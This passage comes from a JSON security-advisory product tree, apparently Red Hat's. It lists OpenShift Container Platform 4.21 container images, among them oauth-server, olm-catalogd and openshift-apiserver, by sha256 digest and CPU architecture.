"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:939f3334417609fa2a140629d6bc3ab13cc99128da92b32c5b437820422875b0_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:939f3334417609fa2a140629d6bc3ab13cc99128da92b32c5b437820422875b0_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:4def742b6a5ef27c09ac9540e132622ec7178284d8900b9a844cb425e8be0c94_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:4def742b6a5ef27c09ac9540e132622ec7178284d8900b9a844cb425e8be0c94_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:4def742b6a5ef27c09ac9540e132622ec7178284d8900b9a844cb425e8be0c94_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:6961835f3eac4677fd6738bf0b02fc6f4742e1f9de0654b44be7a56646317625_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:6961835f3eac4677fd6738bf0b02fc6f4742e1f9de0654b44be7a56646317625_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:6961835f3eac4677fd6738bf0b02fc6f4742e1f9de0654b44be7a56646317625_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:7c99dbb97255a082834a744bdb8821e85b97166f241c0efea2eb5a71a6b31cce_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:7c99dbb97255a082834a744bdb8821e85b97166f241c0efea2eb5a71a6b31cce_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:7c99dbb97255a082834a744bdb8821e85b97166f241c0efea2eb5a71a6b31cce_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:cd11a61958693a33f6c1013c564a2ea8adb25cb0a2791c22ed862db7f14d06cd_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:cd11a61958693a33f6c1013c564a2ea8adb25cb0a2791c22ed862db7f14d06cd_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:cd11a61958693a33f6c1013c564a2ea8adb25cb0a2791c22ed862db7f14d06cd_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:3a46cffa13a3c2a354b734f98ddb200fb2a8436f9d8bf97fbfa87b81713a63aa_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:3a46cffa13a3c2a354b734f98ddb200fb2a8436f9d8bf97fbfa87b81713a63aa_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:3a46cffa13a3c2a354b734f98ddb200fb2a8436f9d8bf97fbfa87b81713a63aa_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:43e816c2f891134e527145559d700e6b393b9ccec1e3c51ab45dc3ba4ac5f266_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:43e816c2f891134e527145559d700e6b393b9ccec1e3c51ab45dc3ba4ac5f266_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:43e816c2f891134e527145559d700e6b393b9ccec1e3c51ab45dc3ba4ac5f266_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:df0b23ef13ea92efbc083c453d2543401dd22cf0a593ee8d594dd29447d95924_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:df0b23ef13ea92efbc083c453d2543401dd22cf0a593ee8d594dd29447d95924_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:df0b23ef13ea92efbc083c453d2543401dd22cf0a593ee8d594dd29447d95924_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e93849c65903929172f7ee0639d477ec569297cc5b8210550ad973c7b5a46685_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e93849c65903929172f7ee0639d477ec569297cc5b8210550ad973c7b5a46685_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e93849c65903929172f7ee0639d477ec569297cc5b8210550ad973c7b5a46685_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:679519366ae6b8fd4f48a2342a0dc29392c9bb4c970fd63a41fd651b920d3989_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:679519366ae6b8fd4f48a2342a0dc29392c9bb4c970fd63a41fd651b920d3989_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:679519366ae6b8fd4f48a2342a0dc29392c9bb4c970fd63a41fd651b920d3989_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:7b1fff7c34072d0d46fe4b45348d6ac3bf755ac0bde3a30f313ffb23a64b764c_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:7b1fff7c34072d0d46fe4b45348d6ac3bf755ac0bde3a30f313ffb23a64b764c_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:7b1fff7c34072d0d46fe4b45348d6ac3bf755ac0bde3a30f313ffb23a64b764c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:9692d0a74e2a1e5112b0afe712b3ac4b8a84a62a652eb74a0c282b5db6bf6340_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:9692d0a74e2a1e5112b0afe712b3ac4b8a84a62a652eb74a0c282b5db6bf6340_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:9692d0a74e2a1e5112b0afe712b3ac4b8a84a62a652eb74a0c282b5db6bf6340_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:e9ab761cb5e82d2de804f0d95bf729601f2324d8bc11519c17cee964c55799c1_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:e9ab761cb5e82d2de804f0d95bf729601f2324d8bc11519c17cee964c55799c1_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:e9ab761cb5e82d2de804f0d95bf729601f2324d8bc11519c17cee964c55799c1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:d6a1551a5182293d917f662c42fc6b78c53577d57eaa97490a1a59a436ea2a1a_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:d6a1551a5182293d917f662c42fc6b78c53577d57eaa97490a1a59a436ea2a1a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:d6a1551a5182293d917f662c42fc6b78c53577d57eaa97490a1a59a436ea2a1a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:b7efeca8929d172e7503b64eb8cc10702a773659b0164677340b7064fbd1c666_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:b7efeca8929d172e7503b64eb8cc10702a773659b0164677340b7064fbd1c666_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:b7efeca8929d172e7503b64eb8cc10702a773659b0164677340b7064fbd1c666_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:1a44fa131e595d60988892ad25b116fc222f73f6eeeb7ac9a97bf2f4c56c886b_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:1a44fa131e595d60988892ad25b116fc222f73f6eeeb7ac9a97bf2f4c56c886b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:1a44fa131e595d60988892ad25b116fc222f73f6eeeb7ac9a97bf2f4c56c886b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:b51b328c0c3a959fef4f4c0f19e9181ddc6ea7d1fbaaee32aa08e503b4d3e073_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:b51b328c0c3a959fef4f4c0f19e9181ddc6ea7d1fbaaee32aa08e503b4d3e073_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:b51b328c0c3a959fef4f4c0f19e9181ddc6ea7d1fbaaee32aa08e503b4d3e073_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:dbe850c3431727e2807a166c82b2e40b220777e26075f4b8aca1999785a94eac_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:dbe850c3431727e2807a166c82b2e40b220777e26075f4b8aca1999785a94eac_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:dbe850c3431727e2807a166c82b2e40b220777e26075f4b8aca1999785a94eac_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:fddfe46a98d3a4c9a7c189eded7e26758c011f8f32d1617c337711cdd65c18be_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:fddfe46a98d3a4c9a7c189eded7e26758c011f8f32d1617c337711cdd65c18be_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:fddfe46a98d3a4c9a7c189eded7e26758c011f8f32d1617c337711cdd65c18be_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:145c212f961f62d710be50e24fc7a307e756b4a5e255393e003f33d3d5c91f8b_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:145c212f961f62d710be50e24fc7a307e756b4a5e255393e003f33d3d5c91f8b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:145c212f961f62d710be50e24fc7a307e756b4a5e255393e003f33d3d5c91f8b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:19a4b711ef857314773d4ca4f4a8b82d7a117250d4c2c92c57c1d1681e7330f6_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:19a4b711ef857314773d4ca4f4a8b82d7a117250d4c2c92c57c1d1681e7330f6_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:19a4b711ef857314773d4ca4f4a8b82d7a117250d4c2c92c57c1d1681e7330f6_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:4740f94bbe328edec319a168d5c4b35ec7c51ad5f0160a6cb0c450da99868ac1_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:4740f94bbe328edec319a168d5c4b35ec7c51ad5f0160a6cb0c450da99868ac1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:4740f94bbe328edec319a168d5c4b35ec7c51ad5f0160a6cb0c450da99868ac1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:69fed0fc9f0b00ca9000d646f22eb727fdabc7de817dbdcbf28c4517c01e472d_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:69fed0fc9f0b00ca9000d646f22eb727fdabc7de817dbdcbf28c4517c01e472d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:69fed0fc9f0b00ca9000d646f22eb727fdabc7de817dbdcbf28c4517c01e472d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:35d92ed2b2bd3a721f928330e6a5edd25629fbb203db91f62b650e787be215d2_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:35d92ed2b2bd3a721f928330e6a5edd25629fbb203db91f62b650e787be215d2_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:35d92ed2b2bd3a721f928330e6a5edd25629fbb203db91f62b650e787be215d2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:aa0e17fffcbd91951c877b5f4c9287a68f1732f69fda71c9313c38111352e113_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:aa0e17fffcbd91951c877b5f4c9287a68f1732f69fda71c9313c38111352e113_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:aa0e17fffcbd91951c877b5f4c9287a68f1732f69fda71c9313c38111352e113_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:c3a5a723959e11512f7332af7a60f34367a239fcc6572327240d17181b00b9b9_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:c3a5a723959e11512f7332af7a60f34367a239fcc6572327240d17181b00b9b9_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:c3a5a723959e11512f7332af7a60f34367a239fcc6572327240d17181b00b9b9_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:cf1f2538d8092d2de077e2a5f4ad37e73b59b1f25918ffbae586f20f2f2f1364_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:cf1f2538d8092d2de077e2a5f4ad37e73b59b1f25918ffbae586f20f2f2f1364_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:cf1f2538d8092d2de077e2a5f4ad37e73b59b1f25918ffbae586f20f2f2f1364_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3a419c18cfdf7042b7a65afae46f1b43f61935e0cbbcd54e36f49b078a2b070e_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3a419c18cfdf7042b7a65afae46f1b43f61935e0cbbcd54e36f49b078a2b070e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3a419c18cfdf7042b7a65afae46f1b43f61935e0cbbcd54e36f49b078a2b070e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:429a55b2ba3ad36682ecd1620103ecdead80af48c9c42148fd72867e53aab0e0_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:429a55b2ba3ad36682ecd1620103ecdead80af48c9c42148fd72867e53aab0e0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:429a55b2ba3ad36682ecd1620103ecdead80af48c9c42148fd72867e53aab0e0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:7965d673c6109f3fd2baa5efb4c54cae58fb9ba94b33ebba7d187c0f5679c9a0_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:7965d673c6109f3fd2baa5efb4c54cae58fb9ba94b33ebba7d187c0f5679c9a0_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:7965d673c6109f3fd2baa5efb4c54cae58fb9ba94b33ebba7d187c0f5679c9a0_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:991ca2f8ecf0ff4667112c5b0aff40813521700c6dad06f867e0e5e56086d6a7_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:991ca2f8ecf0ff4667112c5b0aff40813521700c6dad06f867e0e5e56086d6a7_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:991ca2f8ecf0ff4667112c5b0aff40813521700c6dad06f867e0e5e56086d6a7_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:27bc2f7818ed3b3c0837670c1906599718807aaee793029ebe3cba852985d107_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:27bc2f7818ed3b3c0837670c1906599718807aaee793029ebe3cba852985d107_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:27bc2f7818ed3b3c0837670c1906599718807aaee793029ebe3cba852985d107_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6195a65079f6c39b06a7be04d290dd49deaeba212ba499d233744d8cfd2c2de7_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6195a65079f6c39b06a7be04d290dd49deaeba212ba499d233744d8cfd2c2de7_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6195a65079f6c39b06a7be04d290dd49deaeba212ba499d233744d8cfd2c2de7_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:ac5ab16306a43fcdea3fbf40873cc8307422796118570ee78c6d2ccd7767fa32_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:ac5ab16306a43fcdea3fbf40873cc8307422796118570ee78c6d2ccd7767fa32_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:ac5ab16306a43fcdea3fbf40873cc8307422796118570ee78c6d2ccd7767fa32_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:cdea677053f22dfbac5d00aad0b562674f4141e7450c7c88072407104275e709_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:cdea677053f22dfbac5d00aad0b562674f4141e7450c7c88072407104275e709_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:cdea677053f22dfbac5d00aad0b562674f4141e7450c7c88072407104275e709_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:1356eb99499d3ee7f4b127a5a3de8c2f97b1ad0b7fd92a508eec43b1ecd0d5b3_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:1356eb99499d3ee7f4b127a5a3de8c2f97b1ad0b7fd92a508eec43b1ecd0d5b3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:1356eb99499d3ee7f4b127a5a3de8c2f97b1ad0b7fd92a508eec43b1ecd0d5b3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:2ac33325bea90b62eddee0e60b1ae0895025c185eaa53ce282f4fb67a0cd42d7_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:2ac33325bea90b62eddee0e60b1ae0895025c185eaa53ce282f4fb67a0cd42d7_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:2ac33325bea90b62eddee0e60b1ae0895025c185eaa53ce282f4fb67a0cd42d7_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:42ccddde25579f460d4d44bb64d6d6413460678db55538c23c9ba1409cdc5648_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:42ccddde25579f460d4d44bb64d6d6413460678db55538c23c9ba1409cdc5648_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:42ccddde25579f460d4d44bb64d6d6413460678db55538c23c9ba1409cdc5648_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:db21a1f0033fc83923453b258ea1dd38bf649ae3c4d3c4ef2301d4ce943b6bb0_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:db21a1f0033fc83923453b258ea1dd38bf649ae3c4d3c4ef2301d4ce943b6bb0_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:db21a1f0033fc83923453b258ea1dd38bf649ae3c4d3c4ef2301d4ce943b6bb0_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:30ce84b72533a1bafc328c4fa4cd97eeb4491e235cba8fff6c48756dab8e8271_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:30ce84b72533a1bafc328c4fa4cd97eeb4491e235cba8fff6c48756dab8e8271_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:30ce84b72533a1bafc328c4fa4cd97eeb4491e235cba8fff6c48756dab8e8271_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:6ef682c9b130a604095f29fd22801d700a8126af83838690377c796c831ac0d0_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:6ef682c9b130a604095f29fd22801d700a8126af83838690377c796c831ac0d0_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:6ef682c9b130a604095f29fd22801d700a8126af83838690377c796c831ac0d0_arm64",
